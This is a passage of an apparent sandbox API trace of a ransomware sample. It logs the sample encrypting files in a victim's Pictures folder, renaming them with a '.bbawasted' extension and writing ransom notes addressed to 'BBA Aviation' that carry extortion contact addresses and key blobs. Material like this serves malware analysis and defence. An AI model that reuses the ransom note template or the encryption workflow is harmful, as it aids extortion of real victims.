out: pbBuffer=0x147ff00) returned 1 [0225.490] CryptReleaseContext (hProv=0x6a6708, dwFlags=0x0) returned 1 [0225.490] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\bD3JvQ-3ZQI-VjL3I.png") returned 50 [0225.490] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x26e) returned 0x6a1cd0 [0225.490] lstrcpyW (in: lpString1=0x6a1d34, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0225.490] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bdcf0 [0225.490] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a69b0) returned 1 [0225.491] CryptGenRandom (in: hProv=0x6a69b0, dwLen=0xa3a, pbBuffer=0x6bdcf0 | out: pbBuffer=0x6bdcf0) returned 1 [0225.491] CryptReleaseContext (hProv=0x6a69b0, dwFlags=0x0) returned 1 [0225.491] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\bD3JvQ-3ZQI-VjL3I.png.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\pictures\\bd3jvq-3zqi-vjl3i.png.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0225.492] WriteFile (in: hFile=0x28c, lpBuffer=0x6bdcf0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bdcf0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0225.493] SetEndOfFile (hFile=0x28c) returned 1 [0225.493] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0225.493] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bdcf0 | out: hHeap=0x660000) returned 1 [0225.493] lstrcpyW (in: lpString1=0x6a1d34, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0225.493] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\bD3JvQ-3ZQI-VjL3I.png" (normalized: "c:\\users\\fd1hvy\\pictures\\bd3jvq-3zqi-vjl3i.png"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\bD3JvQ-3ZQI-VjL3I.png.bbawasted" (normalized: "c:\\users\\fd1hvy\\pictures\\bd3jvq-3zqi-vjl3i.png.bbawasted")) returned 1 [0225.494] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\bD3JvQ-3ZQI-VjL3I.png.bbawasted" (normalized: "c:\\users\\fd1hvy\\pictures\\bd3jvq-3zqi-vjl3i.png.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0225.495] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0225.495] GetFileSize (in: hFile=0x27c, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x43cc [0225.495] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x43cc) returned 0x5f0000 [0225.495] CloseHandle (hObject=0x27c) returned 1 [0225.496] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0225.496] CloseHandle (hObject=0x294) returned 1 [0225.496] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0225.497] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6ce0) returned 1 [0225.497] CryptGenRandom (in: hProv=0x6a6ce0, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0225.497] CryptReleaseContext (hProv=0x6a6ce0, dwFlags=0x0) returned 1 [0225.497] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a64e8) returned 1 [0225.498] CryptGenRandom (in: hProv=0x6a64e8, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0225.498] CryptReleaseContext (hProv=0x6a64e8, dwFlags=0x0) returned 1 [0225.509] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6c4b88 [0225.509] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0225.509] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bdcf0 [0225.509] _snwprintf (in: _Dest=0x6bdcf0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]fWvtzP96Mnrpk4eK/V6TNyMDX6uEhiOfav0eiSxRmwAnZ2ozf65AtSFhQAukzWQm\r\nWJD0CSQ9rpbIZY0w3nXR10QmIjMAd8V8MzSf3ieVv2IApXc9SkeOSY/yeXzQDVX+\r\na5G+Q/QR08oUM/L5EegBpCIK9nbRMx7Nf7B48ySShtm+SdLH+0nW1G4SlN0RR/bO\r\no4YkxnBCq4TniqQnV0MUFehOdYpTSVo3Gmym5HEYyWOl6gDqTnYtu4t5dVRDdZP/\r\nKeo5DWAPwy7PHEfXkuvSldkeDXGHPHv4CQDvEiGaCzwEc1wh4bPleyQayQ6TcxiC\r\nOnjMCOWJXe7VWtO3tjnZXCE335E/+wWV6kuAUJ9qpkmSldfRbcUSXGG5OlMLflS6\r\nOEhToKoQgEncLoNERorGJNDH1Bz9bkvT0WdrnHgZY0tnuO2rNyjooC8Knsw59oPm\r\nabO5DleN+NwgWBS++eqMnxAaRhQTQoAfBvZOwgnc7bTN/Zd5hwMbUXn5AN0FUjze\r\nCbvc1F+iCAKH3/eX1E7L1yzn6CgX2RfoN9WO2j4PCi0TOXO0pgLEEBN+e+TzxvHG\r\nAsN3/0r0/AeqfjajfwJrRhrEG2fNfUBpf/wJN9kosUZcpMVhPru5P0GwQ3BG9Guw\r\nWzk33zyV69KQDHduup89NoD+8rimPcSFno8iQjAdrk0=[end_key]\r\nKEEP IT\r\n") returned 984 [0225.509] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0225.509] WriteFile (in: hFile=0x28c, lpBuffer=0x6bdcf0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bdcf0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0225.509] SetEndOfFile (hFile=0x28c) returned 1 [0225.512] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bdcf0 | out: hHeap=0x660000) returned 1 [0225.512] CloseHandle (hObject=0x28c) returned 1 [0225.513] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a1cd0 | out: hHeap=0x660000) returned 1 [0225.513] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b16f0 | out: hHeap=0x660000) returned 1 [0225.513] _aulldvrm () returned 0x0 [0225.513] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6928) returned 1 [0225.514] CryptGenRandom (in: hProv=0x6a6928, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0225.514] CryptReleaseContext (hProv=0x6a6928, dwFlags=0x0) returned 1 [0225.514] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\BRViDmNrT2PA2YbC.jpg") returned 49 [0225.514] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x26c) returned 0x6a1f58 [0225.514] lstrcpyW (in: lpString1=0x6a1fba, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0225.514] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bdcf0 [0225.514] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6240) returned 1 [0225.516] CryptGenRandom (in: hProv=0x6a6240, dwLen=0xa3a, pbBuffer=0x6bdcf0 | out: pbBuffer=0x6bdcf0) returned 1 [0225.516] CryptReleaseContext (hProv=0x6a6240, dwFlags=0x0) returned 1 [0225.516] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\BRViDmNrT2PA2YbC.jpg.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\pictures\\brvidmnrt2pa2ybc.jpg.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0225.517] WriteFile (in: hFile=0x28c, lpBuffer=0x6bdcf0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bdcf0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0225.518] SetEndOfFile (hFile=0x28c) returned 1 [0225.518] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0225.518] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bdcf0 | out: hHeap=0x660000) returned 1 [0225.518] lstrcpyW (in: lpString1=0x6a1fba, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0225.518] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\BRViDmNrT2PA2YbC.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\brvidmnrt2pa2ybc.jpg"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\BRViDmNrT2PA2YbC.jpg.bbawasted" (normalized: "c:\\users\\fd1hvy\\pictures\\brvidmnrt2pa2ybc.jpg.bbawasted")) returned 1 [0225.520] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\BRViDmNrT2PA2YbC.jpg.bbawasted" (normalized: "c:\\users\\fd1hvy\\pictures\\brvidmnrt2pa2ybc.jpg.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0225.520] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x27c [0225.520] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0xd332 [0225.520] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xd332) returned 0x5f0000 [0225.520] CloseHandle (hObject=0x294) returned 1 [0225.522] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0225.523] CloseHandle (hObject=0x27c) returned 1 [0225.523] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0225.523] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6350) returned 1 [0225.524] CryptGenRandom (in: hProv=0x6a6350, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0225.524] CryptReleaseContext (hProv=0x6a6350, dwFlags=0x0) returned 1 [0225.524] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a68a0) returned 1 [0225.525] CryptGenRandom (in: hProv=0x6a68a0, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0225.525] CryptReleaseContext (hProv=0x6a68a0, dwFlags=0x0) returned 1 [0226.427] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6c4b88 [0226.428] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0226.428] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bff48 [0226.428] _snwprintf (in: _Dest=0x6bff48, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]LwxfnjDfPX45iA07odPor65bziq9Hzxy0+Ki8rAm2zZ2heAIHtz2e6f2gUsVoGkA\r\nOy7N7E3rbmL//aSDHmS160P7EcMCTBg3XlVcuIWlzESll9y9OC8uHyoBjpoUfo4Z\r\nqAfTci1rOKe8O4mjQiiOkBfvaVl9sGwU3iwUhvZjxs2/xZKQdcoiK3ZjE2Lt1fTp\r\nIovCi+kPJGIE5LQhfqK+QDJM23B55yHkL91sRPLiEk+dA5nZbwHw9zn4QDWTGgET\r\nVSPrTEI0r3OWIUezo26q433DfVrRhcpjetwkS0uFocJ1lzYBqBQmGY/sJujyiiU+\r\nC0ouaChXCgoRbCSXn+2VpFiJmlPTWY1BuHzg6SXctgApDLfBlwCKI18KaomIM6ps\r\nYGwngYI/pKcXwW3IsOwzVQVApjUV0kk5OiuKvJ7THUnToqKQ4yoD04qBHJVpD6yo\r\nsUYQvqMbz43H7B+NhpvB1OT5x4JOT/8zNwnu3j0CMurcW26bvKbCAj3rYTqrpA1s\r\n2nBvbUQj8nHF10Le0iI3BJnFaWKVuJkZ3+3qXWYMTM1C6O7T+xRr/G1pD+r3CFUP\r\nQHalt0fGikbOg1X060QhK7k52tWkjqmYx+noAS/At0fEkINjtub1lSGcssL5VlO2\r\nvoG1KVzjtIrQkDYLlloa5f8fvpiZ5d9h+kjk9PZFvbN=[end_key]\r\nKEEP IT\r\n") returned 984 [0226.428] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0226.428] WriteFile (in: hFile=0x28c, lpBuffer=0x6bff48*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bff48*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0226.428] SetEndOfFile (hFile=0x28c) returned 1 [0226.937] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bff48 | out: hHeap=0x660000) returned 1 [0226.937] CloseHandle (hObject=0x28c) returned 1 [0226.937] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a1f58 | out: hHeap=0x660000) returned 1 [0226.937] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b22f0 | out: hHeap=0x660000) returned 1 [0226.937] _aulldvrm () returned 0x0 [0226.937] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a5f98) returned 1 [0226.938] CryptGenRandom (in: hProv=0x6a5f98, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0226.938] CryptReleaseContext (hProv=0x6a5f98, dwFlags=0x0) returned 1 [0226.938] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\Nfuk rn-DCx tYvQ.jpg") returned 49 [0226.938] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x26c) returned 0x6a21e0 [0226.938] lstrcpyW (in: lpString1=0x6a2242, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0226.938] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bdcf0 [0226.939] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6680) returned 1 [0226.939] CryptGenRandom (in: hProv=0x6a6680, dwLen=0xa3a, pbBuffer=0x6bdcf0 | out: pbBuffer=0x6bdcf0) returned 1 [0226.939] CryptReleaseContext (hProv=0x6a6680, dwFlags=0x0) returned 1 [0226.939] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\Nfuk rn-DCx tYvQ.jpg.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\pictures\\nfuk rn-dcx tyvq.jpg.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0226.940] WriteFile (in: hFile=0x28c, lpBuffer=0x6bdcf0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bdcf0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0226.941] SetEndOfFile (hFile=0x28c) returned 1 [0226.942] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0226.942] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bdcf0 | out: hHeap=0x660000) returned 1 [0226.942] lstrcpyW (in: lpString1=0x6a2242, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0226.942] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\Nfuk rn-DCx tYvQ.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\nfuk rn-dcx tyvq.jpg"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\Nfuk rn-DCx tYvQ.jpg.bbawasted" (normalized: "c:\\users\\fd1hvy\\pictures\\nfuk rn-dcx tyvq.jpg.bbawasted")) returned 1 [0226.943] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\Nfuk rn-DCx tYvQ.jpg.bbawasted" (normalized: "c:\\users\\fd1hvy\\pictures\\nfuk rn-dcx tyvq.jpg.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0226.943] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x27c [0226.944] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0xf493 [0226.944] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xf493) returned 0x5f0000 [0226.944] CloseHandle (hObject=0x294) returned 1 [0226.946] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0226.947] CloseHandle (hObject=0x27c) returned 1 [0226.947] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x66dd58 [0226.947] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a69b0) returned 1 [0226.948] CryptGenRandom (in: hProv=0x6a69b0, dwLen=0x1b8, pbBuffer=0x66dda0 | out: pbBuffer=0x66dda0) returned 1 [0226.948] CryptReleaseContext (hProv=0x6a69b0, dwFlags=0x0) returned 1 [0226.948] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6790) returned 1 [0226.949] CryptGenRandom (in: hProv=0x6a6790, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0226.949] CryptReleaseContext (hProv=0x6a6790, dwFlags=0x0) returned 1 [0226.961] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6c4b88 [0226.961] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x66dd58 | out: hHeap=0x660000) returned 1 [0226.961] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bdcf0 [0226.961] _snwprintf (in: _Dest=0x6bdcf0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]FmAvMUYakB+vlevWspoaxRrGZBurOzJEW0FufxxijSBbxwA57dHMxC93I9IoAacf\r\n3HDwBbl8mzU/yg9tqLkNA0AsNRy3OmwSr/w6f4wfLpbysITz6fvrzebf0a1/weei\r\nUiQHb1P9JiAE+7fVlESDx50O3E29oqJ2gDcUnoi0knYrDq6jfFkAsFm48KOwPwcL\r\nzhXBeRx+LNwtf7lwkeYediAW5LpmArqH6UKiRp+5fuFGiZNFyYn1pkGgUyq4euJJ\r\nd+/OGsk26cAxcHAbBO07dXXXKyjJjqTKhcb1WK8FFk1CbJi8EHOUlsdIY7LED7Bk\r\n2i9XS930RPJnmvLBTifvqW1OqECvTSZiAEZzTEdjtx+fpO0sZi2nUDligIWy+b9a\r\nnsZR1qGO+xr7NUJxYgcrQ2HPIO/qc80iDxzWzUYbdK4qkveXoY1A9qFvmTF45pcS\r\n42xQ/ukuPK7w4iM5ExVqPhBcqzSo6ZpNC4FNF3kPY+zWSzhNKUqxYI+x2B7X0ri2\r\nLqiymGmvrwWYv+absTL5NB3iGZ/ZP9Q7DDjHVVIQ92cYiju+WO1CSp/HXx5pvJlr\r\nQBqUKHzi4CjDrRsHfOai6AX3D07Wve/gsb+ecGBAzi08ar4Cu4qDT6ZtSRwgFn5M\r\nuQQaQskS+YsKmxo7gdMlWnyVP9KF9AwiyyzyEEGNIxy=[end_key]\r\nKEEP IT\r\n") returned 984 [0226.961] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0226.961] WriteFile (in: hFile=0x28c, lpBuffer=0x6bdcf0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bdcf0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0226.961] SetEndOfFile (hFile=0x28c) returned 1 [0226.964] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bdcf0 | out: hHeap=0x660000) returned 1 [0226.964] CloseHandle (hObject=0x28c) returned 1 [0226.965] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a21e0 | out: hHeap=0x660000) returned 1 [0226.965] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b1f30 | out: hHeap=0x660000) returned 1 [0226.965] _aulldvrm () returned 0x0 [0226.965] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a65f8) returned 1 [0226.966] CryptGenRandom (in: hProv=0x6a65f8, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0226.966] CryptReleaseContext (hProv=0x6a65f8, dwFlags=0x0) returned 1 [0226.966] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\oCQJXq.jpg") returned 39 [0226.966] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x258) returned 0x6bc8e0 [0226.966] lstrcpyW (in: lpString1=0x6bc92e, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0226.966] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bdcf0 [0226.966] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6460) returned 1 [0226.967] CryptGenRandom (in: hProv=0x6a6460, dwLen=0xa3a, pbBuffer=0x6bdcf0 | out: pbBuffer=0x6bdcf0) returned 1 [0226.967] CryptReleaseContext (hProv=0x6a6460, dwFlags=0x0) returned 1 [0226.967] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\oCQJXq.jpg.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\pictures\\ocqjxq.jpg.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0226.968] WriteFile (in: hFile=0x28c, lpBuffer=0x6bdcf0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bdcf0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0226.970] SetEndOfFile (hFile=0x28c) returned 1 [0226.970] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0226.970] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bdcf0 | out: hHeap=0x660000) returned 1 [0226.970] lstrcpyW (in: lpString1=0x6bc92e, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0226.970] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\oCQJXq.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\ocqjxq.jpg"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\oCQJXq.jpg.bbawasted" (normalized: "c:\\users\\fd1hvy\\pictures\\ocqjxq.jpg.bbawasted")) returned 1 [0226.971] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\oCQJXq.jpg.bbawasted" (normalized: 